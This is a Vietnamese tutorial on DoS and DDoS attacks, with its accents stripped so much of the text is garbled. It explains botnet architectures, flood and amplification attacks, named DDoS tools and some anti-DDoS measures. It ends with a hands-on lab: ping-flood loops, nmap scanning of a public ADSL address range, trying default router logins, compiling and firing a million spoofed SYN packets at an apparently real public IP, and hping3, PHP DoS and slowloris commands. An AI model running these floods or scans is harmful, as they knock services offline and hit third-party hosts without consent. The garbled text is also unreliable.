tn cng s gi cc gi tin n cc server mnh nht, nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc server ny s phn hi cc gi tin n a ch ca victim . Vic cng mt lc nh n c nhiu gi tin thng qua cc server l n ny s nhanh chng lm nghn ng truyn ca my tnh nn nhn v lm crash , reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c kt n i Internet n 20

ginv i ng truyn bnh thng cng c th nh b t c h th ng c ng truyn t t nht th gi i nu nh ta khng kp ngn chn . Trang WebHVA ca chng ta cng b DoS va ri bi cch tn cng ny y III. t s phng ph p phng h ng DOS

DoS c th lm tiu t n rt nhiu thi gian cng nh tin bc, v v y, cn phi c nhng bin ph p phng ch ng: M hnh h th ng phi c xy dng hp l, tr nh ph thuc ln nhau qu mc d dn n mt b ph n gp s c s lm c h th ng b trc trc. Thit l p password bo v c c thit b hay c c ngun ti nguyn quan trng. Thit l p c c mc x c thc i v i ngi dng cng nh c c ngun tin trn mng (c c th ng tin c p nh t nh tuyn gia c c router cng nn thit l p ch x c thc) Xy dng h th ng lc th ng tin trn router, firewall v h th ng bo v ch ng li SYN flood. h chp nh n c c dch v cn thit, tm thi dng c c dch v cha c yu cu cung cp hoc kh ng s dng. Xy dng h th ng nh mc, gi i hn cho ngi s dng ngn nga trng hp ngi dng c c mu n li dng c c ti nguyn trn server tn c ng ch nh server hay mng, server kh c. Lin tc c p nh t, nghin cu, kim tra ph t hin c c l hng bo m t v c bin ph p khc phc kp thi. S dng c c bin ph p kim tra hot ng ca h th ng mt c ch lin tc ph t hin ngay nhng hnh ng bt bnh thng. Xy dng h th ng d phng.

21

Ph n III : DDOS
I: Kh i nim DDos (Distributed Denial Of Service) Distributed Denial Of Service (DDoS) l k thu t tn c ng lm c c ISP lo u, gi i hacker ch nh th ng th kh ng c ng nh n DdoS l k thu t tn c ng ch nh th ng. Th nhng lack hat ang c rt nhiu u th khi trin khai tn c ng bng k thu t DdoS. II: c giai on ca cuc tn c ng DDos ao gm 3 giai o n: 1 Giai on chun b: hun b c ng c quan trng ca cuc tn c ng, c ng c ny th ng thng hot ng theo m hnh client-server. Hacker c th vit phn mm ny hay down load mt c ch d dng, theo th ng k tm thi c khong hn 10 c ng c DDoS c cung cp min ph trn mng (c c c ng c ny s phn t ch chi tit vo phn sau) K tip, dng c c k thu t hack kh c nm trn quyn mt s host trn mng. tin hnh ci t c c software cn thit trn c c host ny, vic cu hnh v th nghim ton b attack-netword (bao gm mng l i c c m y b li dng cng v i c c software c thit l p trn , m y ca hacker hoc mt s m y kh c c thit l p nh im ph t ng tn c ng) cng s c thc hin trong giai on ny. 2 Giai on x c nh mc tiu v thi im Sau khi x c nh mc tiu ln cu i, hacker s c hot ng iu chnh attacknetword chuyn h ng tn c ng v ph a mc tiu. Yu t thi im s quyt nh mc thit hi v t c p ng ca mc tiu i v i cuc tn c ng. 3 Pht ng tn c ng v xa du vt ng thi im nh, hacker ph t ng tn c ng t m y ca mnh, lnh tn c ng ny c th i qua nhiu cp mi n host thc s tn c ng. Ton b attacknetwork (c th ln n hng ngn m y), s vt cn nng lc ca server mc tiu lin tc, ngn chn kh ng cho n hot ng nh thit k. Sau mt khong thi gian tn c ng th ch hp, hacker tin hnh xa mi du vt c th truy ngc n mnh, vic ny i hi trnh kh c cao v kh ng tuyt i cn thit III i n tr tng quan a os atta k-network Nhn chung DDoS attack-network c hai m hnh chnh: M hnh Agent Handler M hnh IRC Based

22

Di y l s chnh phn loi cc kiu tn cng DDoS

DDoS attack-network

Agent -Handler

IRC - Based

Client Handler Communication

Client Handler Communication

Secret/private channel

Public channel

TCP

UDP

ICMP

TCP

UDP

ICMP

1: M hnh Agent Handler Theo m hnh ny, attack-network gm 3 thnh phn: Agent, lient v Handler lient : l software c s hacker iu khin mi hot ng ca attack- network Handler : l mt thnh phn software trung gian gia Agent v lient Agent : l thnh phn software thc hin s tn c ng mc tiu, nh n iu khin t Client thng qua cc Handler Kin trc attack-network kiu Agent Handler
Attacker Attacker

Handler

Handler

Handler

Handler

Agent

Agent

Agent

Agent

Agent

Victim
Attacker s t lient giao tip v i cc1 Handler x c nh s lng Agent ang online, iu chnh thi im tn c ng v c p nh t c c Agent. Ty theo c ch attacker cu hnh attack-network, c c Agent s chu s qun l ca mt hay nhiu Handler. Th ng thng Attacker s t Handler software trn mt Router hay mt server c lng traffic lu th ng nhiu. Vic ny nhm lm cho c c giao tip gia lient, handler v Agent kh b ph t hin. c gia tip ny th ng thng xy ra trn cc protocol TCP, UDP hay I MP. h nhn thc s ca c c Agent th ng thng 23

kh ng h hay bit h b li dng vo cuc tn c ng kiu DDoS, do h kh ng kin thc hoc c c chng trnh ackdoor Agent ch s dng rt t ti nguyn h th ng lm cho hu nh kh ng th thy nh hng g n hiu nng ca h th ng. 2 :M hnh IRC Based Internet Relay hat (IR ) l mt h th ng online chat multiuser, IR cho php User to mt kt n i n multipoint n nhiu user kh c v chat thi gian thc. Kin trc c IR network bao gm nhiu IR server trn khp internet, giao tip v i nhau trn nhiu knh (channel). IR network cho php user to ba loi channel: public, private v serect. Public channel: ho php user ca channel thy IR name v nh n c message ca mi user kh c trn cng channel Private channel: c thit k giao tip v i c c i tng cho php. Kh ng cho php c c user kh ng cng channel thy IR name v message trn channel. Tuy nhin, nu user ngoi channel dng mt s lnh channel locator th c th bit c s tn ti ca private channel . Secrect channel : tng t private channel nhng kh ng th x c nh bng channel locator. Kin trc attack-network ca kiu IRC-Base
Attacker Attacker

IRC NETWORK

Agent

Agent

Agent

Agent

Agent

Victim
IRC ased net work cng tng t nh Agent Handler network nhng m hnh ny s dng c c knh giao tip IR lm phng tin giao tip gia lient v Agent (kh ng s dng Handler). S dng m hnh ny, attacker cn c thm mt s li th kh c nh: + c giao tip d i dng chat message lm cho vic ph t hin chng l v cng kh khn + IR traffic c th di chuyn trn mng v i s lng l n m kh ng b nghi ng + Kh ng cn phi duy tr danh s ch c c Agent, hacker ch cn logon vo IR server l c th nh n c report v trng th i c c Agent do c c channel gi v.

24

+ Sau cng: IR cng l mt m i trng file sharing to iu kin ph t t n c c Agent code ln nhiu m y kh c. IV: Phn Lo i ki u t n ng os Nhn chung, c rt nhiu bin th ca k thu t tn c ng DDoS nhng nu nhn d i gc chuyn m n th c th chia c c bin th ny thnh hai loi da trn mch ch tn c ng: Lm cn kit bng th ng v lm cn kit ti nguyn h th ng. D i y l s m t s phn loi c c kiu tn c ng DDoS.
DDoS attack

Bandwith Deleption Deleption

Resource Deleption

Flood Attack

Amplification Attack

Protocol Exploit Attack

Malformed Paclket attack

UDP

ICMP

Smuft attack

Flaggle Attack

TCP SYS

Attack

PUSH +ACK SYN Attack

IP @ Attack

IP Packet Options Attack

Random Port Attack

Static Port Attack

Spoof Source Attack

Direct Attack

Loop Attack Spoof source Attack Spoof source Attack Spoof source Attack Spoof source Attack

1. Nhng kiu tn c ng lm cn kit bng th ng andWith Depletion Attack c thit k nhm lm trng ng p mng mc tiu v i nhng traffic kh ng cn thit, v i mc ch lm gim t i thiu kh nng ca c c traffic hp l n c h th ng cung cp dch v ca mc tiu. hai loi andWith Depletion Attack: Flood attack: iu khin c c Agent gi mt lng l n traffic n h th ng dch v ca mc tiu, lm dch v ny b ht kh nng v bng th ng. Amplification attack: iu khin c c Agent hay lient t gi message n mt a ch IP broadcast, lm cho tt c c c m y trong subnet ny gi message n h th ng dch v ca mc tiu. Phng ph p ny lm gia tng traffic kh ng cn thit, lm suy gim bng th ng ca mc tiu. 1.1. Flood attack Trong phng ph p ny, c c Agent s gi mt lng l n IP traffic lm h th ng dch v ca mc tiu b ch m li, h th ng b treo hay t n trng th i hot ng bo ha. Lm cho c c User thc s ca h th ng kh ng s dng c dch v.

25

Ta c th chia Flood Attack thnh hai loi: UDP Flood Attack: do t nh cht connectionless ca UDP, h th ng nh n UDP message ch n gin nh n vo tt c c c packet mnh cn phi x l. Mt lng l n c c UDP packet c gi n h th ng dch v ca mc tiu s y ton b h th ng n ngng t i hn. c UDP packet ny c th c gi n nhiu port ty hay ch duy nht mt port. Th ng thng l s gi n nhiu port lm cho h th ng mc tiu phi cng ra x l phn h ng cho c c packet ny. Nu port b tn c ng kh ng sn sng th h th ng mc tiu s gi ra mt I MP packet loi destination port unreachable. Th ng thng c c Agent software s dng a ch IP gi che giu hnh tung, cho nn c c message tr v do kh ng c port x l s dn n mt i ch Ip kh c. UDP Flood attack cng c th lm nh hng n c c kt n i xung quanh mc tiu do s hi t ca packet din ra rt mnh. I MP Flood Attack: c thit k nhm mc ch qun l mng cng nh nh v thit b mng. Khi c c Agent gi mt lng l n I MP_E HO_REPLY n h th ng mc tiu th h th ng ny phi reply mt lng tng ng Packet tr li, s dn n nghn ng truyn. Tng t trng hp trn, a ch IP ca c Agent c th b gi mo. 2.2. Amplification Attack Amplification Attack nhm n vic s dng c c chc nng h tr a ch IP broadcast ca c c router nhm khuych i v hi chuyn cuc tn c ng. hc nng ny cho php bn gi ch nh mt a ch IP broadcast cho ton subnet bn nh n thay v nhiu a ch. Router s c nhim v gi n tt c a ch IP trong subnet packet broadcast m n nh n c. Attacker c th gi broadcast message trc tip hay th ng qua mt s Agent nhm lm gia tng cng ca cuc tn c ng. Nu attacker trc tip gi message, th c th li dng c c h th ng bn trong broadcast network nh mt Agent.

26

Attacker/Agent

VICTIM

Amplifier

Amplifier Network System th chia amplification attack thnh hai loi, Smuft va Fraggle attack: Smuft attack: trong kiu tn c ng ny attacker gi packet n network amplifier (router hay thit b mng kh c h tr broadcast), v i a ch ca nn nhn. Th ng thng nhng packet c dng l I MP E HO REQUEST, c c packet ny yu cu yu cu bn nh n phi tr li bng mt I MP E HO REPLY packet. Network amplifier s gi n I MP E HO REQUEST packet n tt c c c h th ng thuc a ch broadcast v tt c c c h th ng ny s REPLY packet v a ch IP ca mc tiu tn c ng Smuft Attack. Fraggle Attack: tng t nh Smuft attack nhng thay v dng I MP ECHO REQUEST packet th s dng UDP E HO packet gi m mc tiu. Th t ra cn mt bin th kh c ca Fraggle attack s gi n UDP E HO packet n chargen port (port 19/UNIX) ca mc tiu, v i a ch bn gi l echo port (port 7/UNIX) ca mc tiu, to nn mt vng lp v hn. Attacker ph t ng cuc tn c ng bng mt E HO REQUEST v i a ch bn nh n l mt a ch broadcast, ton b h th ng thuc a ch ny l p tc gi REPLY n port echo ca nn nhn, sau t nn nhn mt E HO REPLY li gi tr v a ch broadcast, qu trnh c th tip din. y ch nh l nguyn nhn Flaggle Attack nguy him hn Smuft Attack rt nhiu. 2: Nhng kiu tn c ng lm cn kit ti nguyn Theo nh ngha: Resource Deleption Attack l kiu tn c ng trong Attacker gi nhng packet dng c c protocol sai chc nng thit k, hay gi nhng packet v i dng lm tt nghn ti nguyn mng lm cho c c ti nguyn ny kh ng phc v user th ng thng kh c c 27

2.1. Protocol Exploit Attack T P SYS Attack: Transfer ontrol Protocol h tr truyn nh n v i tin c y cao nn s dng phng thc bt tay gia bn gi v bn nh n tr c khi truyn d liu. c u tin, bn gi gi mt SYN REQUEST packet (Synchronize). n nh n nu nh n c SYN REQUEST s tr li bng SYN/A K REPLY packet. c cu i cng, bn gi s truyn packet cu i cng A K v bt u truyn d liu. SYS

TCP Client
Client Port 1024-65535

SYN/ACK

TCP Server
80

ACK

Service Port 1-1023

Nu bn server tr li mt yu cu SYN bng mt SYN/A K REPLY nhng kh ng nh n c A K packet cu i cng sau mt khong thi gian quy nh th n s resend li SYN/A K REPLY cho n ht thi gian timeout. Ton b ti nguyn h th ng d tr x l phin giao tip nu nh n c A K packet cu i cng s b phong ta cho n ht thi gian timeout.
SYS packet with a deliberately fraudulent (spoofed) source IP return address

Malicious TCP Client

SYN

Victim TCP Server

80

?
SYS/ACK

Nm c im yu ny, attacker gi mt SYN packet n nn nhn v i a ch bn gi l gi mo, kt qu l nn nhn gi SYN/A K REPLY n mt a ch kh v s kh ng bao gi nh n c A K packet cu i cng, cho n ht thi gian timeout nn nhn m i nh n ra c iu ny v gii phng c c ti nguyn h th ng. Tuy nhin, nu lng SYN packet gi mo n v i s lng nhiu v dn d p, h th ng ca nn nhn c th b ht ti nguyn.
Client SYN
SYN/ACK SYN/ACK

Server

Attacker/Agent SYN

Server
SYN/ACK

ACK

28

PUSH = ACK Attack: Trong TCP protocol, cc packet c cha trong buffer, khi buffer y th c c packet ny s c chuyn n ni cn thit. Tuy nhin, bn gi c th yu cu h th ng unload buffer tr c khi buffer y bng c ch gi mt packet v i PUSH v A K mang gi tr l 1. Nhng packet ny lm cho h th ng ca nn nhn unload tt c d liu trong T P buffer ngay l p tc v gi mt A K packet tr v khi thc hin xong iu ny, nu qu trnh c din ra lin tc v i nhiu Agent, h th ng s kh ng th x l c lng l n packet gi n v s b treo. 2.2. Malformed Packet Attack Malformed Packet Attack l c ch tn c ng dng c c Agent gi c c packet c cu trc kh ng ng chun nhm lm cho h th ng ca nn nhn b treo. hai loi Malformed Packet Attack: IP address attack: dng packet c a ch gi v nh n gi ng nhau lm cho h iu hnh ca nn nhn kh ng x l ni v b treo. IP packet options attack ngu nhin ha vng OPTION trong IP packet v thit l p tt c c c bit QoS ln 1, iu ny lm cho h th ng ca nn nhn phi t n thi gian phn t ch, nu s dng s lng l n Agent c th lm h th ng nn nhn ht kh nng x l. V: t s t nh a ng o atta k
DDoS software Tool Attack Network Comminication

Agent Setup

OS supported

Instalation

Hide with rootkit

Protocol

Encruption

Agent Activation Methods

Unix

Solaris Linux Windows

Active

Passive

Yes

No
TCP UDP
ICMP

Actively Poll

Live&wait

Bugged website

Corrupted File

Agent Handlerl

IRC Basedl

YES Private/Serect

No Public Backdoor Trojan Buffer Overlfow Client Handlerl Agent Handlerl None

rt nhiu im chung v mt software ca c c c ng c DDoS attack. th k ra mt s im chung nh: c ch ci Agent software, phng ph p giao tip gia c c attacker, handler v Agent, im chung v loi h iu hnh h tr c c c ng c ny. S trn m t s so s nh tng quan gia c c c ng c tn c ng DDoS ny.

29

1:

h th

i t

gent

Attacker c th dng phng ph p active v passive ci t agent software ln c c m y kh c nhm thit l p attack-network kiu Agent-Handler hay IRC-based. ch ci t Active: Scaning: dng c c c ng c nh Nmap, Nessus tm nhng s h trn c c h th ng ang online nhm ci t Agentsoftware. h , Nmap s tr v nhng th ng tin v mt h th ng c ch nh bng a ch IP, Nessus tm kim t nhng a ch IP bt k v mt im yu bit tr c no . ackdoor: sau khi tm thy c danh s ch c c h th ng c th li dng, attacker s tin hnh xm nh p v ci Agentsoftware ln c c h th ng ny. rt nhiu th ng tin sn c v c ch thc xm nh p trn mng, nh site ca t chc ommon Vulnerabilities and Exposures ( VE), y lit k v phn loi trn 4.000 loi li ca tt c c c h th ng hin c. Th ng tin ny lu n sn sng cho c gi i qun tr mng ln hacker. Trojan: l mt chng trnh thc hin mt chc nng th ng thng no , nhng li c mt s chc nng tim n phc v cho mc ch ring ca ngi vit m ngi dng kh ng th bit c. th dng trojan nh mt Agent software. Buffer Overflow: t n dng li buffer overflow, attacker c th lm cho chu trnh thc thi chng trnh th ng thng b chuyn sang chu trnh thc thi chng trnh ca hacker (nm trong vng d liu ghi ). th dng c ch ny tn c ng vo mt chng trnh c im yu buffer overflow chy chng trnh Agent software. ch ci t passive ug Website: attacker c th li dng mt s li ca web brower ci Agent software vo m y ca user truy c p. Attaker s to mt website mang ni dung tim n nhng code v lnh t by user. Khi user truy c p ni dung ca website, th website download v ci t Agent software mt c ch b m t. Microsoft Internet Explorer web browser thng l mc tiu ca c ch ci t ny, v i c c li ca ActiveX c th cho php IE brower t ng download v ci t code trn m y ca user duyt web. orrupted file: mt phng ph p kh c l nhng code vo trong c c file th ng thng. Khi user c hay thc thi c c file ny, m y ca h l p tc b nhim Agent software. Mt trong nhng k thu t ph bin l t tn file rt di, do default ca c c h iu hnh ch hin th phn u ca tn file nn attacker c th gi km theo email cho nn nhn file nh sau: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe, do ch thy phn Iloveyou.txt hin th nn user s m file ny c v l p tc file ny c thc thi v Agent code c ci vo m y nn nhn. Ngoi ra cn nhiu c ch kh c nh ngy trang file, ghp file Rootkit: l nhng chng trnh dng xa du vt v s hin din ca Agent hay Handler trn m y ca nn nhn. Rootkit thng c dng trn Hander software c ci, ng vai tr xung yu cho s hot ng ca attack-network hay trn cc m i trng m kh nng b ph t hin ca Handler l rt cao. Rootkit rt t khi dng trn c c Agent do mc quan trng ca Agent kh ng cao v nu c mt mt s Agent cng kh ng nh hng nhiu n attack-network. 30

2: Giao tip trn Attack-Network Protocol: giao tip trn attack-network c th thc hin trn nn c c protocol TCP, UDP, ICMP. M ha c c giao tip: mt vi c ng c DDoS h tr m ha giao tip trn ton b attack-network. Ty theo protocol c s dng giao tip s c c c phng ph p m ha th ch hp. Nu attack-network dng IR -based th private v secrect channel h tr m ha giao tip. ch k ch hot Agent: c hai phng ph p ch yu k ch hot Agent. ch th nht l Agent s thng xuyn qut thm d Handler hay IR channel nh n ch th (active Agent). ch th hai l Agent ch n gin l nm vng ch ch th t Handler hay IRC Channel. 3: c nn tng h tr Agent

c ng c DDoS th ng thng c thit k hot ng tng th ch v i nhiu h iu hnh kh c nhau nh: Unix, Linux, Solaris hay Windows. c thnh phn ca attack-network c th v n hnh trn c c m i trng h iu hnh kh c nhau. Th ng thng Handler s v n hnh trn c c h chy trn c c server l n nh Unix, Linux hay Solaris. Agent th ng thng chy trn h iu hnh ph bin nht l windows do cn s lng l n d khai th c. VI: ts ng o

Da trn nn tng chung ca phn trn, c nhiu c ng c c vit ra, th ng thng c c c ng c ny l m ngun m nn mc phc tp ngy cng cao v c nhiu bin th m i l. 1: ng c DDoS dng Agent Handler: TrinOO: l mt trong c c c ng c DDoS u tin c ph t t n rng ri. TrinOO c kin trc Agent Handler, l c ng c DDoS kiu andwidth Depletion Attack, s dng k thu t UDP flood. c version u tin ca TrinOO khng h tr gi mo a ch IP. TrinOO Agent c ci t li dng li remote buffer overrun. Hot ng trn h iu hnh Solaris 2.5.1 Red Hat Linux 6.0. Attack network giao tip dng T P (attacker client v handler) v UDP (Handler v Agent). M ha giao tip dng phng ph p m ha i xng gia lient, handler v Agent. Tribe Flood Network (TFN): Kiu kin trc Agent Handler, c ng c DDoS ho tr kiu andwidth Deleption Attack v Resourse Deleption Attack. S dng k thu t UDP flood, I MP Flood, T P SYN v Smurf Attack. c version u tin kh ng h tr gi mo a ch IP, TFN Agent c ci t li dng li buffer overflow. Hot ng trn h iu hnh Solaris 2.x v Red Hat Linux 6.0. Attack Network giao tip dng I MP E HO REPLY packet (TFN2K h tr thm T P/UDP v i t nh nng chn protocol ty ), kh ng m ha giao tip (TFN2K h tr m ha)

31

Stacheldraht: l bin th ca TFN c thm kh nng updat Agent t ng. Giao tip telnet m ha i xng gia Attacker v Handler. Shaft: l bin th ca TrinOO, giao tip Handler Agent trn UDP, Attacker Hendle trn Internet. Tn c ng dng k thu t UDP, ICMP v TCP flood. C th tn c ng ph i hp nhiu kiu cng lc. th ng k chi tit cho php attacker bit tnh trng tn tht ca nn nhn, mc quy m ca cuc tn c ng iu chnh s lng Agent. 2. ng c DDoS dng IR Based: ng c DDoS dng IR -based c ph t trin sau c c c ng c dng Agent Handler. Tuy nhin, c ng c DDoS dng IR phc tp hn rt nhiu, do t ch hp rt nhiu c t nh ca c c c ng c DDoS dng Agent Handler. Trinity: l mt in hnh ca c ng c dng ny. Trinity c hu ht c c k thu t tn c ng bao gm: UDP, T P SYS, T P A K, T P fragment, T P NULL, TCP RST, TCP random flag, TCP ESTABLISHED packet flood. N c sn kh nng ngu nhin ha a ch bn gi. Trinity cng h tr T P flood packet v i kh nng ngu nhn t p ONTROL FLAG. Trinity c th ni l mt trong s c c c ng c DDoS nguy him nht. Ngoi ra c th nhc thm v mt s c ng c DDoS kh c nh Knight, c thit k chy trn Windows, s dng k thu t ci t ca troijan back Orifice. Knight dng cc k thu t tn c ng nh SYV, UDP Flood v Urgent Pointer Flooder. Sau cng l Kaiten, l bin th ca Knight, h tr rt nhiu k thu t tn c ng nh: UDP, T P flood, SYN, PUSH + A K attack. Kaiten cng tha hng kh nng ngu nhin ha a ch gi mo ca Trinity.

VII: hng k thut

TI- DDOS

Tn c ng DDOS hay cn c gi tn c ng t ch i dch v n gin c hiu l to ra 1 lt truy c p o t vo mt a ch website ti cng mt thi im no nh sn nhm nh s p m y ch lu tr khin n chy ch m hoc kh ng th chy c na. Th t s th kh ng c phng ph p ch ng DDOS hiu qu nht nhng nu v i mc nh v mang t nh kh ng chuyn khi s dng c c phn mm c l p trnh sn quy m nh l th ta hon ton c th ch ng phng ch ng. h 1: h ng iframe. y l phng ph p c xem l th s nht. K tn c ng s mn 1 website c lt truy c p l n no chn c c iframe h ng v website cn nh ri cho chy lnh refresh (ti li) nhiu ln hoc h vit sn 1 t p tin flash v i c ng dng tng t ri t ln website v khi ngi dng truy c p vo website ny th h v tnh bt c d tr thnh ngi tn c ng website kia. V i hnh thc tn c ng kiu nh th ny bn hon ton c th ch ng li bng c ch chn 1 on m Javascript ch ng chn iframe t c c website kh c n website ca bn. <script language="JavaScript"> 32

if (top.location != self.location) {top.location = self.location} </script> h 2: h ng ti l i trang we

Mt hnh thc tn c ng kh c na l dng ph m F5 lin tc c ch , hoc dng mt phn mm c l p trnh sn v i c ng dng tng t (ti li trang web lin tc sau nhng khong thi gian nh sn) ca mt nhm ngi lm cho trang web ca bn ti li (reload) lin tc. Vic ny c th lm t n bng th ng ca trang web hoc lm trang web chy ch m v nhng kt n i o. V i c ch thc tn c ng ny th nu dng c ch mt ch ng coi nh l v ch. Nu bn b tn c ng nh th ny th bn hy thit l p t p tin .htaccess v i ni dung: RewriteCond %{HTTP_REFERER} !^http(s)?://(www.)?daklak.org [NC] RewriteCond %{HTTP_USER_AGENT} !bingbot [NC] RewriteCond %{HTTP_USER_AGENT} !YandexImages [NC] RewriteCond %{HTTP_USER_AGENT} !YandexBot [NC] RewriteCond %{HTTP_USER_AGENT} !Googlebot [NC] RewriteCond %{HTTP_USER_AGENT} !Slurp [NC] RewriteCond %{HTTP_USER_AGENT} !crawler [NC] RewriteCond %{HTTP_USER_AGENT} !msnbot [NC] RewriteCond %{HTTP_USER_AGENT} !alexa [NC] RewriteRule !antiddos.phtml http://daklak.org/antiddos.phtml?%{REQUEST_URI} [ QSA] ng dng ca on htaccess trn l lc nhng referer n t c c site kh c nhng bot tm kim vn hot ng bnh thng. Sau to thm mt mt t p tin antiddos.phtml c ni dung <? $text = $HTTP_SERVER_VARS['QUERY_STRING']; $text = preg_replace("#php\&#si",'php?',$text); echo('<center><a href=http://daklak.org/?'.$text.'><font color="blue">[Click here to c ontinue]</font></a</center>'); ?> n sa daklak.org thnh a ch web bn, sau bn upload 2 t p tin ny ln th mc g c ca website. Nh v y l mi khi truy c p vo website, nu ln u tin th s c th ng b o yu cu nhn chut th bn m i vo c website v c c ln sau s kh ng c v c c phn mm DDOS c l p trnh s b chn li b c click chut vo trang web ln truy c p u tin nn vic ti li trang web ch n thun l 1 trang HTML nh kh ng nh hng nhiu n h th ng. Ch l cch ny ch p dng cho website ang s dng server chy trn nn Linux. h 3: i i h n s k t n i we site t i m t thi i m

Khi mt kh ch truy c p vo website th s to ra mt truy vn kt n i v i c s d liu ( SDL) ly th ng tin v tr v th ng qua hin th ca website. Mi m y ch s c 33

php bao nhiu truy vn kt n i l hn nh v khi vt qu hn mc ny th vic truy c p s kh khn hoc kh ng th truy xut c. c tin tc li dng vo iu ny to ra c c truy c p o, kt n i o th ng qua proxy hay chuyn nghip hn l mng botnet nhm nh s p trang web v ph hng SDL website. hn ch iu ny ta c th ch ng gi i hn s kt n i truy vn tin (lt truy c p) cng mt thi im. n thm dng on m sau vo trang ch ca website. function server_busy($numer) { if (THIS_IS == 'WEBSITE' && PHP_OS == 'Linux' and @file_exists ( '/proc/load avg' ) and $filestuff = @file_get_contents ( '/proc/loadavg' )) { $loadavg = explode ( ' ', $filestuff ); if (trim ( $loadavg [0] ) > $numer) { print '<meta http-equiv="content-type" content="text/html; charset=UTF8" />'; print 'Lng truy c p ang qu ti, mi bn quay li sau vi pht.'; exit ( 0 ); } } } $srv = server_busy ( 1000 ); // 1000 l s ngi truy c p ti 1 thi im on m trn c ngha cho php 1000 ngi online trn website ti mt thi im. Nu vt qua s 1000 th kh ch truy c p s nh n c th ng b o: Lng truy cp ang qu ti. Mi bn quay li sau vi pht. h on m ny ch p dng cho ng n ng l p trnh PHP. h 4: hn IP t n ng ng .hta ess

Khi b IP ca 1 n c no tn c ng nhiu bn c th chn tt c IP ca n c bng c ch vo trang web ny http://www.countryipblocks.net/count...elect-formats/ Sau t ch vo chn .htaccess deny, v tm ountry trong list bn d i, sau copy list IP vo file .htaccess (t file .htaccess root nh) y ch l b n c ch ch ng mang t nh cht gin n p dng cho nhng t tn c ng nh l. website ca mnh hot ng t t v c sc ch ng chi li nhng t tn c ng quy m l n bn nn: - T i u ha website v d bn c th xy dng b nh m (cache) cho website nhm gim s kt n i vo SDL. - La chn nh cung cp hosting lu tr web t t c nhng i ph v i nhng t tn c ng.

34

Ph n 4

ng

nm ts os v os

ht n

ng

1. Ping of Dealth Attack - Trong h iu hnh Window ta c th s dng lnh ping IP -t -l 5000 ping mt destination mt cch lin tc

Nu nh bn mu n m cng mt lc 20 ca s Window ping th ta c th kt hp v i cu lnh For nh sau For /L %i in (1,1,20) do start ping 192.168.1.254 -t -l 36000 nh v y chng trnh s m ra cng mt lc 20 ca s window ping lin tc n IP 192.168.1.254

35

2. Syn Flood Attack bi phn ny ta s th thc hin SYN Flood Attack vo router ADSL. u tin ta x c nh xem hin ti ang c bao nhiu router ADSL ang m port 80 bng cng c Nmap Gi s IP Public hin thi ca mnh ang l 118.68.226.103, ta s dng cu lnh nmap sS p 80 118.68.226.1/24 scan

Ta thc hin scan v xut ra file l scan_adsl.txt

36

Kim tra ni dung file scan_adsl.txt v chn ra mt IP ta lm lab tip tc

V d trong 1 on file scan_adsl.txt c ni dung nh bn d i ngha l IP 118.68.226.7 ang m port 80 Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7) Host is up (0.037s latency). PORT STATE SERVICE 80/tcp open http

Ta vo trnh duyt web kim tra IP trang web ca IP ny v th nh p vo username: admin v password admin mc nh

Ta s thc hin syn flood attack vo port 80 trn router ADSL ny bng cng c syn-flood-alpha1.tar.gz. Ta thc hin qu trnh ci t gi ng nh bn d i.

37

root@bt:~/Desktop# ls scan_adsl.txt syn-flood-alpha1.tar.gz root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz syn-flood/ syn-flood/Makefile syn-flood/gpl.txt syn-flood/syn-flood.cpp root@bt:~/Desktop# cd syn-flood root@bt:~/Desktop/syn-flood# ls gpl.txt Makefile syn-flood.cpp root@bt:~/Desktop/syn-flood# make g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp g++ -o syn-flood syn-flood.o Ta thc hin qu trnh tn cng bng cu lnh bn d i gi ra 100000 gi tin syn root@bt:~/Desktop/syn-flood# ./syn-flood Usage: ./syn-flood --ip IP --port PORT [verbose] -h --help Display this usage information. -i --ip Destination IP address. -p --port Destination port. -n --num Number of packets to send. -v --verbose Print verbose messages. root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000 Sent 1000000 packets. Ta s dng chng trnh Wireshark phn tch qu trnh hot ng ca cng c ny th thy chng trnh gi ra 100000 gi tin T P SYN n victim v router adsl v i IP 118.68.226.7 v i cc source IP l cc IP gi khc nhau.

38

3. S Dng Hping3 thc hin Syn Flood Attack My victim c IP l 192.168.1.101/24 ( Window XP ) v my attacker c IP l 192.168.1.100/24 ( Back Track 5 ) u tin ta thc hin qu trnh scan c c port ang open ca Victim bng cng c Nmap root@bt:~# nmap -sS 192.168.1.101 PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:9F:87:19 (VMware) Ta s dng hping3 SYN Flood vo port ang m l 445 root@bt:~# man hping3 => Kim tra cc thng s ca hping3 root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 => thc hin SYN FLOOD vo victim c IP l 192.168.1.101 -a gi dng IP 192.168.1.254 -p port 445 -S thc hin Syn Flood attack -i --interval wait (uX for X microseconds, for example -i u1000) --fast alias for -i u10000 (10 packets for second) --faster alias for -i u1000 (100 packets for second) --flood sent packets as fast as possible. Don't show replies. 39

root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 c 100000 - ngha l ount, ta s gi 100000 n victim Ti my Victim nu nh b SYN Flood ta kim tra trng thi kt n i bng lnh netstat -ano th thy xut hin rt nhiu kt n i SYN

4. PHP DoS - Ta s thc hin upload source PHP DoS ln mt Web Server, v s dng server ny tn cng mt server khc. - u tin ta thc hin vic upload source vo chng trnh PHP DoS vo Web Server 40

Restart li dch v apache

Ta s dng trnh duyt web kt vo trang PHP DoS v thc hin tn cng vo victim no

Sau khi attack xong th chng trnh s th ng k li cho ta s lng gi tin.

41

S dng wireshark capture li traffic th ta s c c hnh nh bn d i.

5. Apache DoS Slowloris Slowrist nh hng n Web Server Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer.. cn c c web server ca Window IIS 6.0, IIS 7.0 th kh ng nh hng bi c ng c ny Download source code chng trnh ti trang http://ha.ckers.org/slowloris/slowloris.pl v to thnh file c tn l slowloris.pl G n cho chng trnh c quyn thc thi

Kim tra xem chng trnh slowloris c o n gi tr timeout

42

Thc hin DoS vo mt victim bng cu lnh perl ./slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5, ta nn xem thm trong phn help ca chng trnh bit thm ngha ca cc bin

43

